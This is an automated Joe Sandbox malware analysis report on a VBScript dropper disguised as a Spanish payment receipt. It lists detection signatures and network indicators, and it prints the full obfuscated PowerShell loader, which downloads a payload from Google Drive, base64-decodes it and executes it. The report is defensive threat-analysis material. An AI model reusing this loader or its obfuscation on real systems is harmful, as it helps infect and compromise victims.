Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JUSTIFICANTE DE PAGO.vbs

Overview

General Information

Sample name:JUSTIFICANTE DE PAGO.vbs
Analysis ID:1430768
MD5:98cded86c15d6f27d03e1ff9443cc0a2
SHA1:aa7e6cf10ace8891de39a6340b62b84f15d39a98
SHA256:a2793f248743616fac792f8d191c26c9d65f63ff1016820508cbda367b906e24
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonete Gon,sSpad )Kolle ');$Blikdaases93=$Pcerne[0];Multiplikatorernes (Ulnage 'hyste$MejetgKa hilGenneoScapub kil,aMo erl odbo:AltdeF StillKegleaRealla Udfre num dCecomeAfflas Cu a=Emo,iNMarsie ,ecywSolec-Vok eOKri,kbGromwjSpokee Alp.cm telt est R,kniSChampyPlatisFiksptRespeeSolstmArthr.SaalsNVedlieDentitNivel.C,ppeWPissoeTroopb exogC .ndmlRubbeir.geneFertinR,abatOverk ');Multiplikatorernes (Ulnage 'Uns.c$ orkyFcornllLogisaFo,ocaAr heeRehabdKor,meIna.ssEdder.HalsyHNonnaeDe,okaLnmo,d OctoeNi rorMakahsC.chi[,efen$DirekZ Rehoo VaadoPav,lt orskeBatekcMa.keh Ul,mnKluppi.progcMyeloiQuinta KratnMonod]Intra=Stj,t$AlmiruIlystnWel cldehumoMaalegMacergZuluke .ecrdLgdsl ');$Afsbe=Ulnage 'Bi,isFVideolSpermaRensnaHulleeOutwrd Fu,deStabisSkr s.hymenDAur.doZ chiw solinSnk mlGuffao Pr raMiliedToldsF Troni StrolV.scue Fu,u(Ballo$TetraBRussilimproi U,cokFelind Dis,aUn,ola Cha.sR puneAabe,sGreen9 ,itz3Ene.r,,ngka$ Te.aSCompalMesenaAfgifvS.atuiSdmlkcPu.leiClarssAktivmGynec)Samm. ';$Afsbe=$Nulindkomsten[1]+$Afsbe;$Slavicism=$Nulindkomsten[0];Multiplikatorernes (Ulnage ',uper$ sentg TodalRemado ,emtbBroncaSkridlIndfr:OtterbTrillr vsavnmattieForbdrStagniGenang Du.itPorceiAmbitgAntipt Oret=Preme( emicTH.rtaePerfesQueuetviske-Ansl.PRgt baWhysutkonsehFrems Stvl$Dje aSDividl BeboaUd,mnvVe.stiCrittc phioila insCanalmAntig)Brnee ');while (!$brnerigtigt) {Multiplikatorernes (Ulnage 'Stvht$FlgesgambitlLip roSk,lpbAi,maanrc,elRodma:UndisUSjl,gn Sd,krStuk,eHarefeHexoslA.usts Vask=A.sor$brnebtFa.ulrSowe.u,arsveFinva ') ;Multiplikatorernes $Afsbe;Multiplikatorernes (Ulnage '.eddaSMetattTropiakontrrSvendtArmad-GenneS Salgl Coque SvineNegripSemic L,sa4Drosc ');Multiplikatorernes (Ulnage ' St,r$Sadelg GawklSheepo ZoanbJageraRejuvl Beta:Intrab VacirVitt nFeasie UdskrMarroiS.uthgpetertForhaiCtenogNicottStres=Ph.no( Go aT TrekeBlufrsO,dbotjudie- eviPSpiseaIndsktMellsh.lymp Afste$ ndhfSAlkyllNydamaRegervBrygniPregucauto.iE,katsuma,dm rav) Uncr ') ;Multiplikatorernes (Ulnage ' ,rom$Over g,minolOsteooAfganbPolysaUdstalTerme: chuPAnacrrT,anseHenleeOutwav adreaDresspRetshoAntiorMrkbaab.llitPe.arolys,nrRosin2Famil5Overw5Alon,=Perfi$C zsegGlsnil PoleoTilskbF,rroaSa dslVatic: uldkSFre nkSamk.iHoopslAfhjed Tnd.psuperaVolvodR,ekadRa.ioe Tomjs Log kMe tra DisklHelfalHetere Kavin SalgsFinan+Tomas+Doura% .uni$KompeP halac Intee GnomrIndslnSlgerereaff.RecescPhospol resuTu ann C aitAfter ') ;$Blikdaases93=$Pcerne[$Preevaporator255];}Multiplikatorernes (Ulnage 'Dis,i$ Prs gJenvrl S.fforesunb ,ndhaG.ardl Etho: RagoePreofxRappetFritieUnshrn AfsluZonataCimeltSel.pePomfrsLin.e Koord=Kunst LandsGUdsleeSomnitunapp-GoldrCG.nero.nrusnF,nget UdsteprobonChiddtLigni Disti$FideiSDurrylRosmuaAzotiv F,owi Ca bc S,ili nugssBromams,kke ');Multiplikatorernes (Ulnage 'P gna$HammegM,cedl .dlaoAdvarbnyctiaSprngl Thai:SortkJUniveu.lassnNowisgTubereSpo.tnAntar D.sm= Nati G nan[ ,ngsSamicryBrndesForvatKursueAssurmAntit.critiC Ejenoin,skn.atiivGlasbe Tet,rLollate.han] vera:Spe.t: OmdaF GuilrAd.lsoWhaurmTra,sBSkaftaDisarsMrsgeeStutt6amanu4Haa dSSlvsmt,nartrP,rceiBeraanA tisgSt.rt(,fsbn$MaijaeS,imlxH riztv loueCheckn ApotuBore,aMorget FredeBack,sHaema)Rekto ');Multiplikatorernes (Ulnage 'Kv li$ExcalgLipaelstatsoStamkbKapseadittel Gard:BatchFKvienoGaranr dfylmOr.adi J.rln BrowdLeaves Mungk L,moeAbortdOutrieNedsksTill. Ba,sk=flako Opsp[S.oroSsubcayR,mblsTafiat wargestemmmGdann. FilaT.tivkePursuxAger,tUigen.Su.phESk,ffnObskuc GardoOverbd etriTropin Petegsigte] Unco:Sfyrb:Sub oAFane,SAnnitC.tykpICo.meIMento. NaioG telteDissotBrintSVidnet Regnr,mpori ayinnGaiasgRing (Ach.n$NonexJSusp.uBatisnRick gCaj.teL.dlenConvo) egre ');Multiplikatorernes (Ulnage 'F.age$Te.reg Frikl UdenoKos.eb IldfaExtralNonig:sminkcMenarhlin,oeGor lcUfuldkOutruhAra ieLarmefrhabdtCun,ieWittitFrems=Preco$ multFCurcuoG anirInfiemBearii StubnFlovpd StiksDelp.kTot.ee Vidtd Yu,eeFablesDesta. Pe,isF lthuSkillbHerlisPolyctFo slr ForhiFor,in ThyrgOptic( Spec2Ickin9Hotel7Inc,m6Forbr8Asphy4deute,Siksa2Civ l8Phyll0Unind8 In.v1Riste)Bykva ');Multiplikatorernes $checkheftet;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7508 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7348INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1d3ca8:$b2: ::FromBase64String(
  • 0x1d3d88:$b2: ::FromBase64String(
  • 0x1d4828:$b2: ::FromBase64String(
  • 0x1d4870:$b2: ::FromBase64String(
  • 0x26d729:$b2: ::FromBase64String(
  • 0x26d75f:$b2: ::FromBase64String(
  • 0x26d796:$b2: ::FromBase64String(
  • 0x26d7ce:$b2: ::FromBase64String(
  • 0x26d807:$b2: ::FromBase64String(
  • 0x26d841:$b2: ::FromBase64String(
  • 0x26d87c:$b2: ::FromBase64String(
  • 0x26d8b8:$b2: ::FromBase64String(
  • 0x26d8f5:$b2: ::FromBase64String(
  • 0x26d933:$b2: ::FromBase64String(
  • 0x26d972:$b2: ::FromBase64String(
  • 0x26d9b2:$b2: ::FromBase64String(
  • 0x26d9f3:$b2: ::FromBase64String(
  • 0x26dab7:$b2: ::FromBase64String(
  • 0x3c910:$s1: -join
  • 0x3d070:$s1: -join
  • 0x66820:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_7348.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x10047:$b2: ::FromBase64String(
  • 0xd400:$s1: -join
  • 0x6bac:$s4: +=
  • 0x6c6e:$s4: +=
  • 0xae95:$s4: +=
  • 0xcfb2:$s4: +=
  • 0xd29c:$s4: +=
  • 0xd3e2:$s4: +=
  • 0xf62c:$s4: +=
  • 0xf6ac:$s4: +=
  • 0xf772:$s4: +=
  • 0xf7f2:$s4: +=
  • 0xf9c8:$s4: +=
  • 0xfa4c:$s4: +=
  • 0xdb15:$e4: Get-WmiObject
  • 0xdd04:$e4: Get-Process
  • 0xdd5c:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7296, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7296, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes (Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks. ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei FoshtDros

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: JUSTIFICANTE DE PAGO.vbsReversingLabs: Detection: 21%
Source: JUSTIFICANTE DE PAGO.vbsVirustotal: Detection: 8%Perma Link
Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb2 source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbiTP)l source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb{Yy source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbz source: powershell.exe, 00000001.00000002.1810470481.000001FF75F5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb~YD source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5F936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJXP
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5ECD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
